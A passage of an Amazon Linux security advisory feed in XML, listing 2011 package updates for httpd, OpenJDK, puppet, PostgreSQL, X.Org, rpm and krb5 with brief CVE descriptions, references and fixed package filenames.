</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3348" title="" id="CVE-2011-3348" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368" title="" id="CVE-2011-3368" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1391.html" title="" id="RHSA-2011:1391" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="httpd-devel" version="2.2.21" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-devel-2.2.21-1.19.amzn1.i686.rpm</filename></package><package name="httpd-tools" version="2.2.21" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-tools-2.2.21-1.19.amzn1.i686.rpm</filename></package><package name="httpd" version="2.2.21" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-2.2.21-1.19.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.21" release="1.19.amzn1" epoch="1" arch="i686"><filename>Packages/mod_ssl-2.2.21-1.19.amzn1.i686.rpm</filename></package><package name="httpd-debuginfo" version="2.2.21" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/httpd-debuginfo-2.2.21-1.19.amzn1.i686.rpm</filename></package><package name="mod_ssl" version="2.2.21" release="1.19.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod_ssl-2.2.21-1.19.amzn1.x86_64.rpm</filename></package><package name="httpd-debuginfo" version="2.2.21" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-debuginfo-2.2.21-1.19.amzn1.x86_64.rpm</filename></package><package name="httpd-manual" version="2.2.21" release="1.19.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd-manual-2.2.21-1.19.amzn1.noarch.rpm</filename></package><package name="httpd-tools" version="2.2.21" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-tools-2.2.21-1.19.amzn1.x86_64.rpm</filename></package><package name="httpd-devel" 
version="2.2.21" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-devel-2.2.21-1.19.amzn1.x86_64.rpm</filename></package><package name="httpd" version="2.2.21" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd-2.2.21-1.19.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-10</id><title>Amazon Linux - ALAS-2011-10: critical priority package update for java-1.6.0-openjdk</title><issued date="2011-10-31 18:22:00" /><updated date="2014-09-14 14:26:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3560:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality and integrity, related to JSSE.
It was found that HttpsURLConnection did not perform SecurityManager checks in the setSSLSocketFactory method. An untrusted Java application or applet running in a sandbox could use this flaw to bypass connection restrictions defined in the policy.
CVE-2011-3558:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to HotSpot.
A flaw was found in the Java HotSpot virtual machine. An untrusted Java application or applet could use this flaw to disclose portions of the VM memory, or cause it to crash.
CVE-2011-3557:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, 1.4.2_33 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to RMI.
A flaw was found in the Java RMI registry implementation. A remote RMI client could use this flaw to execute code on the RMI server with unrestricted privileges.
CVE-2011-3556:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, 1.4.2_33 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to RMI.
A flaw was found in the Java RMI (Remote Method Invocation) registry implementation. A remote RMI client could use this flaw to execute arbitrary code on the RMI server running the registry.
CVE-2011-3554:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors.
An insufficient error checking flaw was found in the unpacker for JAR files in pack200 format. A specially-crafted JAR file could use this flaw to crash the Java Virtual Machine (JVM) or, possibly, execute arbitrary code with JVM privileges.
CVE-2011-3553:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JRockit R28.1.4 and earlier allows remote authenticated users to affect confidentiality, related to JAXWS.
The Java API for XML Web Services (JAX-WS) implementation in OpenJDK was configured to include the stack trace in error messages sent to clients. A remote client could possibly use this flaw to obtain sensitive information.
CVE-2011-3552:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote attackers to affect integrity via unknown vectors related to Networking.
It was found that Java applications running with SecurityManager restrictions were allowed to use too many UDP sockets by default. If multiple instances of a malicious application were started at the same time, they could exhaust all available UDP sockets on the system.
CVE-2011-3551:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
An integer overflow flaw, leading to a heap-based buffer overflow, was found in the Java2D code used to perform transformations of graphic shapes and images. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions.
CVE-2011-3548:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability, related to AWT.
A flaw was found in the AWTKeyStroke implementation. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions.
CVE-2011-3547:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, and 1.4.2_33 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking.
An information leak flaw was found in the InputStream.skip implementation. An untrusted Java application or applet could possibly use this flaw to obtain bytes skipped by other threads.
CVE-2011-3544:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7 and 6 Update 27 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Scripting.
It was found that the Java ScriptingEngine did not properly restrict the privileges of sandboxed applications. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions.
CVE-2011-3521:
Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, and 5.0 Update 31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deserialization.
A flaw was found in the IIOP (Internet Inter-Orb Protocol) deserialization code. An untrusted Java application or applet running in a sandbox could use this flaw to bypass sandbox restrictions by deserializing specially-crafted input.
CVE-2011-3389:
This update fixes several vulnerabilities in the Sun Java 6 Runtime Environment and the Sun Java 6 Software Development Kit. Further information about these flaws can be found on the Oracle Java SE Critical Patch page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java 6 Runtime Environment and the IBM Java 6 Software Development Kit. Detailed vulnerability descriptions are linked from the IBM "Security alerts" page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java 2 Runtime Environment and the IBM Java 2 Software Development Kit. Detailed vulnerability descriptions are linked from the IBM "Security alerts" page, listed in the References section.
This update fixes several vulnerabilities in the IBM Java 1.4.2 Runtime Environment and the IBM Java 1.4.2 Software Development Kit. Detailed vulnerability descriptions are linked from the IBM "Security alerts" page, listed in the References section.
The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.
A flaw was found in the way the SSL 3 and TLS 1.0 protocols used block ciphers in cipher-block chaining (CBC) mode. An attacker able to perform a chosen plain text attack against a connection mixing trusted and untrusted data could use this flaw to recover portions of the trusted data sent over the connection.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389" title="" id="CVE-2011-3389" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3521" title="" id="CVE-2011-3521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3544" title="" id="CVE-2011-3544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3547" title="" id="CVE-2011-3547" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3548" title="" id="CVE-2011-3548" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3551" title="" id="CVE-2011-3551" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3552" title="" id="CVE-2011-3552" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3553" title="" id="CVE-2011-3553" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3554" title="" id="CVE-2011-3554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3556" title="" id="CVE-2011-3556" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3557" title="" id="CVE-2011-3557" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3558" title="" id="CVE-2011-3558" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3560" title="" id="CVE-2011-3560" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1380.html" title="" id="RHSA-2011:1380" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package 
name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.9.10.40.amzn1.i686.rpm</filename></package><package name="java-1.6.0-openjdk-src" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-src-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-javadoc" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-javadoc-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-demo" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-demo-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-devel" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-devel-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk-debuginfo" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.6.0-openjdk-debuginfo-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package><package name="java-1.6.0-openjdk" version="1.6.0.0" release="52.1.9.10.40.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.6.0-openjdk-1.6.0.0-52.1.9.10.40.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-11</id><title>Amazon Linux - ALAS-2011-11: medium priority package update for puppet</title><issued date="2011-10-31 18:22:00" /><updated date="2014-09-14 14:31:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3871:
Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x, when running in --edit mode, uses a predictable file name, which allows local users to run arbitrary Puppet code or trick a user into editing arbitrary files.
CVE-2011-3870:
Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x allows local users to modify the permissions of arbitrary files via a symlink attack on the SSH authorized_keys file.
CVE-2011-3869:
Puppet 2.7.x before 2.7.5, 2.6.x before 2.6.11, and 0.25.x allows local users to overwrite arbitrary files via a symlink attack on the .k5login file.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3869" title="" id="CVE-2011-3869" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3870" title="" id="CVE-2011-3870" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3871" title="" id="CVE-2011-3871" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="puppet" version="2.6.6" release="3.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.6.6-3.2.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.6.6" release="3.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.6.6-3.2.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.6.6" release="3.2.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.6.6-3.2.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.6.6" release="3.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.6.6-3.2.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.6.6" release="3.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.6.6-3.2.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.6.6" release="3.2.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.6.6-3.2.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-12</id><title>Amazon Linux - ALAS-2011-12: medium priority package update for postgresql</title><issued date="2011-10-31 18:24:00" /><updated date="2014-09-14 14:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-2483:
crypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain platforms, PostgreSQL before 8.4.9, and other products, does not properly handle 8-bit characters, which makes it easier for context-dependent attackers to determine a cleartext password by leveraging knowledge of a password hash.
A signedness issue was found in the way the crypt() function in the PostgreSQL pgcrypto module handled 8-bit characters in passwords when using Blowfish hashing. Up to three characters immediately preceding a non-ASCII character (one with the high bit set) had no effect on the hash result, thus shortening the effective password length. This made brute-force guessing more efficient as several different passwords were hashed to the same value.
A signedness issue was found in the way the PHP crypt() function handled 8-bit characters in passwords when using Blowfish hashing. Up to three characters immediately preceding a non-ASCII character (one with the high bit set) had no effect on the hash result, thus shortening the effective password length. This made brute-force guessing more efficient as several different passwords were hashed to the same value.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2483" title="" id="CVE-2011-2483" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1377.html" title="" id="RHSA-2011:1377" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="postgresql-plperl" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-plperl-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-libs" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-libs-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-devel" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-devel-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-docs" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-docs-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-contrib" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-contrib-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-pltcl" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-pltcl-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-server" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-server-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-plpython" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-plpython-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-debuginfo" version="8.4.9" release="1.13.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql-debuginfo-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-test" version="8.4.9" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql-test-8.4.9-1.13.amzn1.i686.rpm</filename></package><package name="postgresql-pltcl" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-pltcl-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-plpython" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-plpython-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-docs" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-docs-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-contrib" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-contrib-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-plperl" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-plperl-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-devel" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-devel-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-server" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-server-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-libs" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-libs-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-test" version="8.4.9" release="1.13.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql-test-8.4.9-1.13.amzn1.x86_64.rpm</filename></package><package name="postgresql-debuginfo" version="8.4.9" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql-debuginfo-8.4.9-1.13.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-13</id><title>Amazon Linux - ALAS-2011-13: medium priority package update for xorg-x11-server</title><issued date="2011-10-31 18:25:00" /><updated date="2014-09-14 14:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2010-4819:
An input sanitization flaw was found in the X.Org Render extension. A malicious, authorized client could use this flaw to leak arbitrary memory from the X.Org server process, or possibly crash the X.Org server.
CVE-2010-4818:
Multiple input sanitization flaws were found in the X.Org GLX (OpenGL extension to the X Window System) extension. A malicious, authorized client could use these flaws to crash the X.Org server or, potentially, execute arbitrary code with root privileges.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4818" title="" id="CVE-2010-4818" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4819" title="" id="CVE-2010-4819" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1359.html" title="" id="RHSA-2011:1359" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="xorg-x11-server-Xvfb" version="1.7.7" release="29.10.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.7.7-29.10.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.7.7" release="29.10.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.7.7-29.10.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.7.7" release="29.10.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.7.7-29.10.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.7.7" release="29.10.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.7.7-29.10.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.7.7" release="29.10.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.7.7-29.10.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.7.7" release="29.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.7.7-29.10.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.7.7" release="29.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.7.7-29.10.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.7.7" release="29.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.7.7-29.10.amzn1.x86_64.rpm</filename></package><package 
name="xorg-x11-server-common" version="1.7.7" release="29.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.7.7-29.10.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.7.7" release="29.10.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.7.7-29.10.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.7.7" release="29.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.7.7-29.10.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-14</id><title>Amazon Linux - ALAS-2011-14: medium priority package update for rpm</title><issued date="2011-10-31 18:25:00" /><updated date="2014-09-14 14:33:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3378:
RPM 4.4.x through 4.9.x, probably before 4.9.1.2, allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via an rpm package with crafted headers and offsets that are not properly handled when a package is queried or installed, related to (1) the regionSwab function, (2) the headerLoad function, and (3) multiple functions in rpmio/rpmpgp.c.
Multiple flaws were found in the way the RPM library parsed package headers. An attacker could create a specially-crafted RPM package that, when queried or installed, would cause rpm to crash or, potentially, execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378" title="" id="CVE-2011-3378" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1349.html" title="" id="RHSA-2011:1349" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="rpm-devel" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-devel-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-libs" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-libs-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-apidocs" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-apidocs-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-python" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-python-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-cron" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-cron-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-build" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-build-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-debuginfo" version="4.8.0" release="16.36.amzn1" epoch="0" arch="i686"><filename>Packages/rpm-debuginfo-4.8.0-16.36.amzn1.i686.rpm</filename></package><package name="rpm-devel" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-devel-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-python" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-python-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-debuginfo" 
version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-debuginfo-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-libs" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-libs-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-apidocs" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-apidocs-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-build" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-build-4.8.0-16.36.amzn1.x86_64.rpm</filename></package><package name="rpm-cron" version="4.8.0" release="16.36.amzn1" epoch="0" arch="x86_64"><filename>Packages/rpm-cron-4.8.0-16.36.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-15</id><title>Amazon Linux - ALAS-2011-15: medium priority package update for krb5</title><issued date="2011-10-31 18:26:00" /><updated date="2014-09-14 14:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-1527:
The kdb_ldap plugin in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) 1.9 through 1.9.1, when the LDAP back end is used, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a kinit operation with incorrect string case for the realm, related to the is_principal_in_realm, krb5_set_error_message, krb5_ldap_get_principal, and process_as_req functions.
Multiple NULL pointer dereference and assertion failure flaws were found in the MIT Kerberos KDC when it was configured to use an LDAP (Lightweight Directory Access Protocol) or Berkeley Database (Berkeley DB) back end. A remote attacker could use these flaws to crash the KDC.
